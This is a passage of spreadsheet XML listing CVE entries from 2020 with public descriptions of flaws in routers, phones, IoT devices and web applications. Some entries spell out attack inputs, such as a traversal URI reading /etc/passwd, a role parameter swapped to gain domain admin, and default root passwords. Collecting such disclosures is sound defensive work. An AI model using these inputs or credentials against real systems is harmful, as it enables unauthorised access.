    <t>** DISPUTED ** vg_lookup in daemons/lvmetad/lvmetad-core.c in LVM2 2.02 mismanages memory, leading to an lvmetad memory leak, as demonstrated by running pvs. NOTE: RedHat disputes CVE-2020-8991 as not being a vulnerability since there’s no apparent route to either privilege escalation or to denial of service through the bug.</t>
  </si>
  <si>
    <t>CVE-2020-8992</t>
  </si>
  <si>
    <t>ext4_protect_reserved_inode in fs/ext4/block_validity.c in the Linux kernel through 5.5.3 allows attackers to cause a denial of service (soft lockup) via a crafted journal size.</t>
  </si>
  <si>
    <t>CVE-2020-8994</t>
  </si>
  <si>
    <t>An issue was discovered on XIAOMI AI speaker MDZ-25-DT 1.34.36, and 1.40.14. Attackers can get root shell by accessing the UART interface and then they can read Wi-Fi SSID or password, read the dialogue text files between users and XIAOMI AI speaker, use Text-To-Speech tools pretend XIAOMI speakers' voice achieve social engineering attacks, eavesdrop on users and record what XIAOMI AI speaker hears, delete the entire XIAOMI AI speaker system, modify system files, stop voice assistant service, start the XIAOMI AI speaker’s SSH service as a backdoor</t>
  </si>
  <si>
    <t>CVE-2020-8995</t>
  </si>
  <si>
    <t>Programi Bilanc Build 007 Release 014 31.01.2020 supplies a .exe file containing several hardcoded credentials to different servers that allow remote attackers to gain access to the complete infrastructure including the website, update server, and external issue tracking tools.</t>
  </si>
  <si>
    <t>CVE-2020-8996</t>
  </si>
  <si>
    <t>AnyShare Cloud 6.0.9 allows authenticated directory traversal to read files, as demonstrated by the interface/downloadwithpath/downloadfile/?filepath=/etc/passwd URI.</t>
  </si>
  <si>
    <t>CVE-2020-8997</t>
  </si>
  <si>
    <t>Older generation Abbott FreeStyle Libre sensors allow remote attackers within close proximity to enable write access to memory via a specific NFC unlock command. NOTE: The vulnerability is not present in the FreeStyle Libre 14-day in the U.S (announced in August 2018) and FreeStyle Libre 2 outside the U.S (announced in October 2018).</t>
  </si>
  <si>
    <t>CVE-2020-9000</t>
  </si>
  <si>
    <t>An issue was discovered in iPortalis iCS 7.1.13.0. Attackers can send a sequence of requests to rapidly cause .NET Input Validation errors. This increases the size of the log file on the remote server until memory is exhausted, therefore consuming the maximum amount of resources (triggering a denial of service condition).</t>
  </si>
  <si>
    <t>CVE-2020-9002</t>
  </si>
  <si>
    <t>An issue was discovered in iPortalis iCS 7.1.13.0. An attacker can gain privileges by intercepting a request and changing UserRoleKey=COMPANY_ADMIN to UserRoleKey=DOMAIN_ADMIN (to achieve Domain Administrator access).</t>
  </si>
  <si>
    <t>CVE-2020-9003</t>
  </si>
  <si>
    <t>A stored XSS vulnerability exists in the Modula Image Gallery plugin before 2.2.5 for WordPress. Successful exploitation of this vulnerability would allow an authenticated low-privileged user to inject arbitrary JavaScript code that is viewed by other users.</t>
  </si>
  <si>
    <t>CVE-2020-9004</t>
  </si>
  <si>
    <t>A remote authenticated authorization-bypass vulnerability in Wowza Streaming Engine 4.8.0 and earlier allows any read-only user to issue requests to the administration panel in order to change functionality. For example, a read-only user may activate the Java JMX port in unauthenticated mode and execute OS commands under root privileges. This issue was resolved in Wowza Streaming Engine 4.8.5.</t>
  </si>
  <si>
    <t>CVE-2020-9005</t>
  </si>
  <si>
    <t>meshsystem.dll in Valve Dota 2 through 2020-02-17 allows remote attackers to achieve code execution or denial of service by creating a gaming server with a crafted map, and inviting a victim to this server. A GetValue call is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-9006</t>
  </si>
  <si>
    <t>The Popup Builder plugin 2.2.8 through 2.6.7.6 for WordPress is vulnerable to SQL injection (in the sgImportPopups function in sg_popup_ajax.php) via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on Wordpress instances. (This issue has been fixed in the 3.x branch of popup-builder.)</t>
  </si>
  <si>
    <t>CVE-2020-9007</t>
  </si>
  <si>
    <t>Codoforum 4.8.8 allows self-XSS via the title of a new topic.</t>
  </si>
  <si>
    <t>CVE-2020-9008</t>
  </si>
  <si>
    <t>Stored Cross-site scripting (XSS) vulnerability in Blackboard Learn/PeopleTool v9.1 allows users to inject arbitrary web script via the Tile widget in the People Tool profile editor.</t>
  </si>
  <si>
    <t>CVE-2020-9012</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the Import People functionality in Gluu Identity Configuration 4.0 allows remote attackers to inject arbitrary web script or HTML via the filename parameter.</t>
  </si>
  <si>
    <t>CVE-2020-9013</t>
  </si>
  <si>
    <t>Arvato Skillpipe 3.0 allows attackers to bypass intended print restrictions by deleting &lt;div id="watermark"&gt; from the HTML source code.</t>
  </si>
  <si>
    <t>CVE-2020-9014</t>
  </si>
  <si>
    <t>In Epson iProjection v2.30, the driver file (EMP_NSAU.sys) allows local users to cause a denial of service (BSOD) via crafted input to the virtual audio device driver with IOCTL 0x9C402402, 0x9C402406, or 0x9C40240A. \Device\EMPNSAUIO and \DosDevices\EMPNSAU are similarly affected.</t>
  </si>
  <si>
    <t>CVE-2020-9015</t>
  </si>
  <si>
    <t>** DISPUTED ** Arista DCS-7050QX-32S-R 4.20.9M, DCS-7050CX3-32S-R 4.20.11M, and DCS-7280SRAM-48C6-R 4.22.0.1F devices (and possibly other products) allow attackers to bypass intended TACACS+ shell restrictions via a | character. NOTE: the vendor reports that this is a configuration issue relating to an overly permissive regular expression in the TACACS+ server permitted commands.</t>
  </si>
  <si>
    <t>CVE-2020-9016</t>
  </si>
  <si>
    <t>Dolibarr 11.0 allows XSS via the joinfiles, topic, or code parameter, or the HTTP Referer header.</t>
  </si>
  <si>
    <t>CVE-2020-9017</t>
  </si>
  <si>
    <t>LiteCart through 2.2.1 allows CSV injection via a customer's profile.</t>
  </si>
  <si>
    <t>CVE-2020-9018</t>
  </si>
  <si>
    <t>LiteCart through 2.2.1 allows admin/?app=users&amp;doc=edit_user CSRF to add a user.</t>
  </si>
  <si>
    <t>CVE-2020-9019</t>
  </si>
  <si>
    <t>The WPJobBoard plugin 5.5.3 for WordPress allows Persistent XSS via the Add Job form, as demonstrated by title and Description.</t>
  </si>
  <si>
    <t>CVE-2020-9020</t>
  </si>
  <si>
    <t>Iteris Vantage Velocity Field Unit 2.3.1, 2.4.2, and 3.0 devices allow the injection of OS commands into cgi-bin/timeconfig.py via shell metacharacters in the NTP Server field.</t>
  </si>
  <si>
    <t>CVE-2020-9021</t>
  </si>
  <si>
    <t>Post Oak AWAM Bluetooth Field Device 7400v2.08.21.2018, 7800SD.2015.1.16, 2011.3, 7400v2.02.01.2019, and 7800SD.2012.12.5 is vulnerable to injections of operating system commands through timeconfig.py via shell metacharacters in the htmlNtpServer parameter.</t>
  </si>
  <si>
    <t>CVE-2020-9022</t>
  </si>
  <si>
    <t>An issue was discovered on Xirrus XR520, XR620, XR2436, and XH2-120 devices. The cgi-bin/ViewPage.cgi user parameter allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-9023</t>
  </si>
  <si>
    <t>Iteris Vantage Velocity Field Unit 2.3.1 and 2.4.2 devices have two users that are not documented and are configured with weak passwords (User bluetooth, password bluetooth; User eclipse, password eclipse). Also, bluetooth is the root password.</t>
  </si>
  <si>
    <t>CVE-2020-9024</t>
  </si>
  <si>
    <t>Iteris Vantage Velocity Field Unit 2.3.1 and 2.4.2 devices have world-writable permissions for the /root/cleardata.pl (executed as root by crond) and /root/loadperl.sh (executed as root at boot time) scripts.</t>
  </si>
  <si>
    <t>CVE-2020-9025</t>
  </si>
  <si>
    <t>Iteris Vantage Velocity Field Unit 2.4.2 devices have multiple stored XSS issues in all parameters of the Start Data Viewer feature of the /cgi-bin/loaddata.py script.</t>
  </si>
  <si>
    <t>CVE-2020-9026</t>
  </si>
  <si>
    <t>ELTEX NTP-RG-1402G 1v10 3.25.3.32 devices allow OS command injection via the PING field of the resource ping.cmd. The NTP-2 device is also affected.</t>
  </si>
  <si>
    <t>CVE-2020-9027</t>
  </si>
  <si>
    <t>ELTEX NTP-RG-1402G 1v10 3.25.3.32 devices allow OS command injection via the TRACE field of the resource ping.cmd. The NTP-2 device is also affected.</t>
  </si>
  <si>
    <t>CVE-2020-9028</t>
  </si>
  <si>
    <t>Symmetricom SyncServer S100 2.90.70.3, S200 1.30, S250 1.25, S300 2.65.0, and S350 2.80.1 devices allow stored XSS via the newUserName parameter on the "User Creation, Deletion and Password Maintenance" screen (when creating a new user).</t>
  </si>
  <si>
    <t>CVE-2020-9029</t>
  </si>
  <si>
    <t>Symmetricom SyncServer S100 2.90.70.3, S200 1.30, S250 1.25, S300 2.65.0, and S350 2.80.1 devices allow Directory Traversal via the FileName parameter to messagelog.php.</t>
  </si>
  <si>
    <t>CVE-2020-9030</t>
  </si>
  <si>
    <t>Symmetricom SyncServer S100 2.90.70.3, S200 1.30, S250 1.25, S300 2.65.0, and S350 2.80.1 devices allow Directory Traversal via the FileName parameter to the syslog.php.</t>
  </si>
  <si>
    <t>CVE-2020-9031</t>
  </si>
  <si>
    <t>Symmetricom SyncServer S100 2.90.70.3, S200 1.30, S250 1.25, S300 2.65.0, and S350 2.80.1 devices allow Directory Traversal via the FileName parameter to daemonlog.php.</t>
  </si>
  <si>
    <t>CVE-2020-9032</t>
  </si>
  <si>
    <t>Symmetricom SyncServer S100 2.90.70.3, S200 1.30, S250 1.25, S300 2.65.0, and S350 2.80.1 devices allow Directory Traversal via the FileName parameter to kernlog.php.</t>
  </si>
  <si>
    <t>CVE-2020-9033</t>
  </si>
  <si>
    <t>Symmetricom SyncServer S100 2.90.70.3, S200 1.30, S250 1.25, S300 2.65.0, and S350 2.80.1 devices allow Directory Traversal via the FileName parameter to authlog.php.</t>
  </si>
  <si>
    <t>CVE-2020-9034</t>
  </si>
  <si>
    <t>Symmetricom SyncServer S100 2.90.70.3, S200 1.30, S250 1.25, S300 2.65.0, and S350 2.80.1 devices mishandle session validation, leading to unauthenticated creation, modification, or elimination of users.</t>
  </si>
  <si>
    <t>CVE-2020-9036</t>
  </si>
  <si>
    <t>Jeedom through 4.0.38 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-9038</t>
  </si>
  <si>
    <t>Joplin through 1.0.184 allows Arbitrary File Read via XSS.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48147.txt</t>
  </si>
  <si>
    <t>Joplin Desktop 1.0.184 - Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-9039</t>
  </si>
  <si>
    <t>Couchbase Server 4.0.0, 4.1.0, 4.1.1, 4.5.0, 4.5.1, 4.6.0 through 4.6.5, 5.0.0, 5.1.1, 5.5.0 and 5.5.1 have Insecure Permissions for the projector and indexer REST endpoints (they allow unauthenticated access).The /settings REST endpoint exposed by the projector process is an endpoint that administrators can use for various tasks such as updating configuration and collecting performance profiles. The endpoint was unauthenticated and has been updated to only allow authenticated users to access these administrative APIs.</t>
  </si>
  <si>
    <t>CVE-2020-9040</t>
  </si>
  <si>
    <t>Couchbase Server Java SDK before 2.7.1.1 allows a potential attacker to forge an SSL certificate and pose as the intended peer. An attacker can leverage this flaw by crafting a cryptographically valid certificate that will be accepted by Java SDK's Netty component due to missing hostname verification.</t>
  </si>
  <si>
    <t>CVE-2020-9041</t>
  </si>
  <si>
    <t>In Couchbase Server 6.0.3 and Couchbase Sync Gateway through 2.7.0, the Cluster management, views, query, and full-text search endpoints are vulnerable to the Slowloris denial-of-service attack because they don't more aggressively terminate slow connections.</t>
  </si>
  <si>
    <t>CVE-2020-9042</t>
  </si>
  <si>
    <t>In Couchbase Server 6.0, credentials cached by a browser can be used to perform a CSRF attack if an administrator has used their browser to check the results of a REST API request.</t>
  </si>
  <si>
    <t>CVE-2020-9043</t>
  </si>
  <si>
    <t>The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key.</t>
  </si>
  <si>
    <t>CVE-2020-9044</t>
  </si>
  <si>
    <t>XXE vulnerability exists in the Metasys family of product Web Services which has the potential to facilitate DoS attacks or harvesting of ASCII server files. This affects Johnson Controls' Metasys Application and Data Server (ADS, ADS-Lite) versions 10.1 and prior; Metasys Extended Application and Data Server (ADX) versions 10.1 and prior; Metasys Open Data Server (ODS) versions 10.1 and prior; Metasys Open Application Server (OAS) version 10.1; Metasys Network Automation Engine (NAE55 only) versions 9.0.1, 9.0.2, 9.0.3, 9.0.5, 9.0.6; Metasys Network Integration Engine (NIE55/NIE59) versions 9.0.1, 9.0.2, 9.0.3, 9.0.5, 9.0.6; Metasys NAE85 and NIE85 versions 10.1 and prior; Metasys LonWorks Control Server (LCS) versions 10.1 and prior; Metasys System Configuration Tool (SCT) versions 13.2 and prior; Metasys Smoke Control Network Automation Engine (NAE55, UL 864 UUKL/ORD-C100-13 UUKLC 10th Edition Listed) version 8.1.</t>
  </si>
  <si>
    <t>CVE-2020-9045</t>
  </si>
  <si>
    <t>During installation or upgrade to Software House C•CURE 9000 v2.70 and American Dynamics victor Video Management System v5.2, the credentials of the user used to perform the installation or upgrade are logged in a file. The install log file persists after the installation.</t>
  </si>
  <si>
    <t>CVE-2020-9046</t>
  </si>
  <si>
    <t>A vulnerability in all versions of Kantech EntraPass Editions could potentially allow an authorized low-privileged user to gain full system-level privileges by replacing critical files with specifically crafted files.</t>
  </si>
  <si>
    <t>CVE-2020-9047</t>
  </si>
  <si>
    <t>A vulnerability exists that could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentially download and run a malicious executable that could allow OS command injection on the system.</t>
  </si>
  <si>
    <t>CVE-2020-9048</t>
  </si>
  <si>
    <t>A vulnerability in specified versions of American Dynamics victor Web Client and Software House CCURE Web Client could allow a remote unauthenticated attacker on the network to delete arbitrary files on the system or render the system unusable by conducting a Denial of Service attack.</t>
  </si>
  <si>
    <t>CVE-2020-9049</t>
  </si>
  <si>
    <t>A vulnerability in specified versions of American Dynamics victor Web Client and Software House C•CURE Web Client could allow an unauthenticated attacker on the network to create and sign their own JSON Web Token and use it to execute an HTTP API Method without the need for valid authentication/authorization. Under certain circumstances, this could be used by an attacker to impact system availability by conducting a Denial of Service attack.</t>
  </si>
  <si>
    <t>CVE-2020-9050</t>
  </si>
  <si>
    <t>Path Traversal vulnerability exists in Metasys Reporting Engine (MRE) Web Services which could allow a remote unauthenticated attacker to access and download arbitrary files from the system.</t>
  </si>
  <si>
    <t>CVE-2020-9054</t>
  </si>
  <si>
    <t>Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2</t>
  </si>
  <si>
    <t>CVE-2020-9055</t>
  </si>
  <si>
    <t>Versiant LYNX Customer Service Portal (CSP), version 3.5.2, is vulnerable to stored cross-site scripting, which could allow a local, authenticated attacker to insert malicious JavaScript that is stored and displayed to the end user. This could lead to website redirects, session cookie hijacking, or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9056</t>
  </si>
  <si>
    <t>Periscope BuySpeed version 14.5 is vulnerable to stored cross-site scripting, which could allow a local, authenticated attacker to store arbitrary JavaScript within the application. This JavaScript is subsequently displayed by the application without sanitization and is executed in the browser of the user, which could possibly cause website redirection, session hijacking, or information disclosure. This vulnerability has been patched in BuySpeed version 15.3.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-9057</t>
  </si>
  <si>
    <t>Z-Wave devices based on Silicon Labs 100, 200, and 300 series chipsets do not support encryption, allowing an attacker within radio range to take control of or cause a denial of service to a vulnerable device. An attacker can also capture and replay Z-Wave traffic. Firmware upgrades cannot directly address this vulnerability as it is an issue with the Z-Wave specification for these legacy chipsets. One way to protect against this vulnerability is to use 500 or 700 series chipsets that support Security 2 (S2) encryption. As examples, the Linear WADWAZ-1 version 3.43 and WAPIRZ-1 version 3.43 (with 300 series chipsets) are vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-9058</t>
  </si>
  <si>
    <t>Z-Wave devices based on Silicon Labs 500 series chipsets using CRC-16 encapsulation, including but likely not limited to the Linear LB60Z-1 version 3.5, Dome DM501 version 4.26, and Jasco ZW4201 version 4.05, do not implement encryption or replay protection.</t>
  </si>
  <si>
    <t>CVE-2020-9059</t>
  </si>
  <si>
    <t>Z-Wave devices based on Silicon Labs 500 series chipsets using S0 authentication are susceptible to uncontrolled resource consumption leading to battery exhaustion. As an example, the Schlage BE468 version 3.42 door lock is vulnerable and fails open at a low battery level.</t>
  </si>
  <si>
    <t>CVE-2020-9060</t>
  </si>
  <si>
    <t>Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages.</t>
  </si>
  <si>
    <t>CVE-2020-9061</t>
  </si>
  <si>
    <t>Z-Wave devices using Silicon Labs 500 and 700 series chipsets, including but not likely limited to the SiLabs UZB-7 version 7.00, ZooZ ZST10 version 6.04, Aeon Labs ZW090-A version 3.95, and Samsung STH-ETH-200 version 6.04, are susceptible to denial of service via malformed routing messages.</t>
  </si>
  <si>
    <t>CVE-2020-9062</t>
  </si>
  <si>
    <t>Diebold Nixdorf ProCash 2100xe USB ATMs running Wincor Probase version 1.1.30 do not encrypt, authenticate, or verify the integrity of messages between the CCDM and the host computer, allowing an attacker with physical access to internal ATM components to commit deposit forgery by intercepting and modifying messages to the host computer, such as the amount and value of currency being deposited.</t>
  </si>
  <si>
    <t>CVE-2020-9063</t>
  </si>
  <si>
    <t>NCR SelfServ ATMs running APTRA XFS 05.01.00 or earlier do not authenticate or protect the integrity of USB HID communications between the currency dispenser and the host computer, permitting an attacker with physical access to internal ATM components the ability to inject a malicious payload and execute arbitrary code with SYSTEM privileges on the host computer by causing a buffer overflow on the host.</t>
  </si>
  <si>
    <t>CVE-2020-9064</t>
  </si>
  <si>
    <t>Huawei smartphone Honor V30 with versions earlier than OxfordS-AN00A 10.0.1.167(C00E166R4P1) have an improper authentication vulnerability. Authentication to target component is improper when device performs an operation. Attackers exploit this vulnerability to obtain some information by loading malicious application, leading to information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9065</t>
  </si>
  <si>
    <t>Huawei smart phone Taurus-AL00B with versions earlier than 10.0.0.203(C00E201R7P2) have a use-after-free (UAF) vulnerability. An authenticated, local attacker may perform specific operations to exploit this vulnerability. Successful exploitation may tamper with the information to affect the availability.</t>
  </si>
  <si>
    <t>CVE-2020-9066</t>
  </si>
  <si>
    <t>Huawei smartphones OxfordP-AN10B with versions earlier than 10.0.1.169(C00E166R4P1) have an improper authentication vulnerability. The Application doesn't perform proper authentication when user performs certain operations. An attacker can trick user into installing a malicious plug-in to exploit this vulnerability. Successful exploit could allow the attacker to bypass the authentication to perform unauthorized operations.</t>
  </si>
  <si>
    <t>CVE-2020-9067</t>
  </si>
  <si>
    <t>There is a buffer overflow vulnerability in some Huawei products. The vulnerability can be exploited by an attacker to perform remote code execution on the affected products when the affected product functions as an optical line terminal (OLT). Affected product versions include:SmartAX MA5600T versions V800R013C10, V800R015C00, V800R015C10, V800R017C00, V800R017C10, V800R018C00, V800R018C10; SmartAX MA5800 versions V100R017C00, V100R017C10, V100R018C00, V100R018C10, V100R019C10; SmartAX EA5800 versions V100R018C00, V100R018C10, V100R019C10.</t>
  </si>
  <si>
    <t>CVE-2020-9068</t>
  </si>
  <si>
    <t>Huawei AR3200 products with versions of V200R007C00SPC900, V200R007C00SPCa00, V200R007C00SPCb00, V200R007C00SPCc00, V200R009C00SPC500 have an improper authentication vulnerability. Attackers need to perform some operations to exploit the vulnerability. Successful exploit may obtain certain permissions on the device.</t>
  </si>
  <si>
    <t>CVE-2020-9069</t>
  </si>
  <si>
    <t>There is an information leakage vulnerability in some Huawei products. An unauthenticated, adjacent attacker could exploit this vulnerability to decrypt data. Successful exploitation may leak information randomly. Affected product versions include: Anne-AL00 Versions earlier than 9.1.0.331(C675E9R1P3T8); Berkeley-L09 Versions earlier than 10.0.1.1(C675R1); CD16-10 Versions earlier than 10.0.2.8; CD17-10 Versions earlier than 10.0.2.8; CD17-16 Versions earlier than 10.0.2.8; CD18-10 Versions earlier than 10.0.2.8; CD18-16 Versions earlier than 10.0.2.8; Columbia-TL00B Versions earlier than 9.0.0.187(C01E181R1P20T8); E6878-370 Versions earlier than 10.0.5.1(H610SP10C00); HUAWEI P30 lite Versions earlier than 10.0.0.185(C605E3R1P3), Versions earlier than 10.0.0.197(C432E8R2P7); HUAWEI nova 4e Versions earlier than 10.0.0.158(C00E64R1P9); Honor 10 Lite 9.0.1.113(C675E11R1P12); LelandP-L22A Versions earlier than 9.1.0.166(C675E5R1P4T8); Marie-AL00AX Versions earlier than 10.0.0.158(C00E64R1P9); Marie-AL00AY Versions earlier than 10.0.0.158(C00E64R1P9); Marie-AL00BX Versions earlier than 10.0.0.158(C00E64R1P9); Marie-L03BX Versions earlier than 10.0.0.188(C605E5R1P1); Marie-L21BX Versions earlier than 10.0.0.188(C432E4R4P1), Versions earlier than 10.0.0.188(C461E5R3P1); Marie-L22BX Versions earlier than 10.0.0.188(C636E3R3P1); Marie-L23BX Versions earlier than 10.0.0.188(C605E5R1P1); TC5200-16 Versions earlier than 10.0.2.8; WS5200-11 Versions earlier than 10.0.2.8; WS5200-12 Versions earlier than 10.0.2.23; WS5200-16 Versions earlier than 10.0.2.8; WS5200-17 Versions earlier than 10.0.2.23; WS5800-10 Versions earlier than 10.0.3.27; WS6500-10 Versions earlier than 10.0.2.8; WS6500-16 Versions earlier than 10.0.2.8</t>
  </si>
  <si>
    <t>CVE-2020-9070</t>
  </si>
  <si>
    <t>Huawei smartphones Taurus-AL00B with versions earlier than 10.0.0.205(C00E201R7P2) have an improper authentication vulnerability. The software insufficiently validate the user's identity when a user wants to do certain operation. An attacker can trick user into installing a malicious application to exploit this vulnerability. Successful exploit may cause some information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9071</t>
  </si>
  <si>
    <t>There is a few bytes out-of-bounds read vulnerability in some Huawei products. The software reads data past the end of the intended buffer when parsing certain message, an authenticated attacker could exploit this vulnerability by sending crafted messages to the device. Successful exploit may cause service abnormal in specific scenario.Affected product versions include:AR120-S versions V200R007C00SPC900,V200R007C00SPCa00</t>
  </si>
  <si>
    <t>CVE-2020-9072</t>
  </si>
  <si>
    <t>Huawei OSD product with versions earlier than OSD_uwp_9.0.32.0 have a local privilege escalation vulnerability. An authenticated, local attacker can constructs a specific file path to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege.</t>
  </si>
  <si>
    <t>CVE-2020-9073</t>
  </si>
  <si>
    <t>Huawei P20 smartphones with versions earlier than 10.0.0.156(C00E156R1P4) have an improper authentication vulnerability. The vulnerability is due to that when an user wants to do certain operation, the software insufficiently validate the user's identity. Attackers need to physically access the smartphone to exploit this vulnerability. Successful exploit could allow the attacker to bypass the limit of student mode function.</t>
  </si>
  <si>
    <t>CVE-2020-9074</t>
  </si>
  <si>
    <t>Huawei Smartphones HONOR 20 PRO;Honor View 20;HONOR 20 have an improper handling of exceptional condition Vulnerability. A component cannot deal with an exception correctly. Attackers can exploit this vulnerability by sending malformed message. This could compromise normal service of affected phones.</t>
  </si>
  <si>
    <t>CVE-2020-9075</t>
  </si>
  <si>
    <t>Huawei products Secospace USG6300;USG6300E with versions of V500R001C30,V500R001C50,V500R001C60,V500R001C80,V500R005C00,V500R005C10;V600R006C00 have a vulnerability of insufficient input verification. An attacker with limited privilege can exploit this vulnerability to access a specific directory. Successful exploitation of this vulnerability may lead to information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-9076</t>
  </si>
  <si>
    <t>HUAWEI P30;HUAWEI P30 Pro;Tony-AL00B smartphones with versions earlier than 10.1.0.135(C00E135R2P11); versions earlier than 10.1.0.135(C00E135R2P8), versions earlier than 10.1.0.135 have an improper authentication vulnerability. Due to the identity of the message sender not being properly verified, an attacker can exploit this vulnerability through man-in-the-middle attack to induce user to access malicious URL.</t>
  </si>
  <si>
    <t>CVE-2020-9077</t>
  </si>
  <si>
    <t>HUAWEI P30 smart phones with versions earlier than 10.1.0.160(C00E160R2P11) have an information exposure vulnerability. The system does not properly authenticate the application that access a specified interface. Attackers can trick users into installing malicious software to exploit this vulnerability and obtain some information about the device. Successful exploit may cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9078</t>
  </si>
  <si>
    <t>FusionCompute 8.0.0 have local privilege escalation vulnerability. A local, authenticated attacker could perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege and compromise the service.</t>
  </si>
  <si>
    <t>CVE-2020-9079</t>
  </si>
  <si>
    <t>FusionSphere OpenStack 8.0.0 have a protection mechanism failure vulnerability. The product incorrectly uses a protection mechanism. An attacker has to find a way to exploit the vulnerability to conduct directed attacks against the affected product.</t>
  </si>
  <si>
    <t>CVE-2020-9083</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smart phones with Versions earlier than 10.1.0.163(C00E160R3P8) have a denial of service (DoS) vulnerability. The attacker can enter a large amount of text on the phone. Due to insufficient verification of the parameter, successful exploitation can impact the service.</t>
  </si>
  <si>
    <t>CVE-2020-9084</t>
  </si>
  <si>
    <t>Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a use-after-free (UAF) vulnerability. An authenticated, local attacker may perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege and compromise the service.</t>
  </si>
  <si>
    <t>CVE-2020-9087</t>
  </si>
  <si>
    <t>Taurus-AL00A version 10.0.0.1(C00E1R1P1) has an out-of-bounds read vulnerability in XFRM module. An authenticated, local attacker may perform a specific operation to exploit this vulnerability. Due to insufficient validation of the parameters, which may be exploited to cause information leak.</t>
  </si>
  <si>
    <t>CVE-2020-9090</t>
  </si>
  <si>
    <t>FusionAccess version 6.5.1 has an improper authorization vulnerability. A command is authorized with incorrect privilege. Attackers with other privilege can execute the command to exploit this vulnerability. This may compromise normal service of the affected product.</t>
  </si>
  <si>
    <t>CVE-2020-9091</t>
  </si>
  <si>
    <t>Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have an out-of-bounds read and write vulnerability. Some functions do not verify inputs sufficiently. Attackers can exploit this vulnerability by sending specific request. This could compromise normal service of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-9092</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 versions earlier than 10.1.0.163(C00E160R3P8) have a JavaScript injection vulnerability. A module does not verify a specific input. This could allow attackers to bypass filter mechanism to launch JavaScript injection. This could compromise normal service of the affected module.</t>
  </si>
  <si>
    <t>CVE-2020-9093</t>
  </si>
  <si>
    <t>There is a use after free vulnerability in Taurus-AL00A versions 10.0.0.1(C00E1R1P1). A module does not deal with specific message properly, which makes a function refer to memory after it has been freed. Attackers can exploit this vulnerability by running a crafted application with common privilege. This would compromise normal service.</t>
  </si>
  <si>
    <t>CVE-2020-9094</t>
  </si>
  <si>
    <t>There is an out of bound read vulnerability in some verisons of Huawei CloudEngine product. A module does not deal with specific message properly. Attackers can exploit this vulnerability by sending malicious packet. This can lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9095</t>
  </si>
  <si>
    <t>HUAWEI P30 Pro smartphone with Versions earlier than 10.1.0.160(C00E160R2P8) has an integer overflow vulnerability. Some functions are lack of verification when they process some messages sent from other module. Attackers can exploit this vulnerability by send malicious message to cause integer overflow. This can compromise normal service.</t>
  </si>
  <si>
    <t>CVE-2020-9096</t>
  </si>
  <si>
    <t>HUAWEI P30 Pro smartphones with Versions earlier than 10.1.0.160(C00E160R2P8) have an out of bound read vulnerability. Some functions are lack of verification when they process some messages sent from other module. Attackers can exploit this vulnerability by send malicious message to cause out-of-bound read. This can compromise normal service.</t>
  </si>
  <si>
    <t>CVE-2020-9098</t>
  </si>
  <si>
    <t>Huawei OceanStor 5310 product with version of V500R007C60SPC100 has an invalid pointer access vulnerability. The software system access an invalid pointer when attacker malformed packet. Due to the insufficient validation of some parameter, successful exploit could cause device reboot.</t>
  </si>
  <si>
    <t>CVE-2020-9099</t>
  </si>
  <si>
